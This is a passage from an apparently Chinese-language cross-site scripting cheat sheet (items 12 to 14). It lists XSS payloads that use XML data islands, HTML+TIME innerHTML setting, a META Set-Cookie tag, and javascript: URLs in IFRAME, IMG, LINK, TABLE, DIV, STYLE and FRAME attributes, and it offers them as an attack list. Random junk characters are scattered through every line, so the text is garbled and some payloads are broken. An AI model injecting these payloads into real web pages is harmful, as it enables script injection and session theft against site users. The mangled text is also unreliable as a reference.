6 D' h$ J% B6 F" J. r [ <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 6 R- z9 |3 X& v- o! a, Y5 H- N5 R9 a) j/ t, U9 B( Y
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>% w2 h+ ?+ U* q# Y* z
, b) i/ S; v7 v3 V3 f% R <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>6 S J" ] j. y$ ^4 ?$ B
# e0 `# H: y8 W/ {; r$ P
12. 利用HTML+TIME。3 d0 w4 L+ p. @: U# U4 d2 c
$ H% L" C, x$ A1 \3 @% O8 G
<HTML><BODY> 0 M% u: Y. e5 M- f0 I , {1 E: ^9 N. Z- i5 m6 f <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">, F; H6 k* o6 @. b" g
4 e z/ I. @" u" n) ]( Z; d2 r <?import namespace="t" implementation="#default#time2"> " D! d- s$ h/ B/ }% n9 f9 L P' b0 d
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>"> / l& g" |& D) @1 o' z' `4 @( f' E# C . j$ c. ^2 w: o </BODY></HTML> 1 g# |9 C6 Z B2 n A3 D 0 x8 D: m, i8 D7 r) \13. 透过META写入Cookie。 ; {( @" y3 p2 e8 u: r+ n+ C' K- U( k: L7 q+ W& [9 m, ]) I& @5 y
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>"> 3 r5 [" F, F" I" X) k8 V& H / u1 w/ r* M0 ^' V, f8 b4 B14. javascript in src , href , url1 K1 ]+ p' T, x% _) s
' c! H, ]2 Y+ m4 ]6 c <IFRAME SRC=javascript:alert(’13′)></IFRAME> ; O. l( r0 v$ S6 w/ U0 A# K, p+ i0 Y' a# s) |8 ^! F3 j& n
<img src="javascript:alert(‘XSS3′)"> M! P# ~& @) ^+ I' b: c/ ^( P2 D# |" v; V
<IMG DYNSRC="javascript:alert(‘XSS20′)"> ! G0 K) m3 U6 o: z0 H ; h: r" i; b W5 ?8 g# L Q0 M <IMG LOWSRC="javascript:alert(‘XSS21′)">0 A7 a/ H; W& K% ?
. [- N B1 N' X! E0 f. O# F <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">( i* M& c) {+ n7 H& z* A+ ^$ J
2 Q4 W! F9 L3 Z3 S, D) X5 A* s. ? <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME> % E, t6 ^* C+ W0 G `8 G/ o2 |- e' Q/ P <TABLE BACKGROUND="javascript:alert(‘XSS29′)">; X2 q# f1 C- T8 j3 r4 `
6 [2 }2 N1 u1 v) w$ [
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">: k( w6 X9 z u# O2 d
h/ y: J, o9 p$ ~( j <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}8 v3 g4 K. w. y, L
; z% N' J1 X, P2 v- N6 x: i
</STYLE><A CLASS=XSS></A>% c1 d- z5 u [9 c
/ U& D' |4 ?: \! ]* o1 Q. S
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>+ Q- K& f. G# S( M/ s# `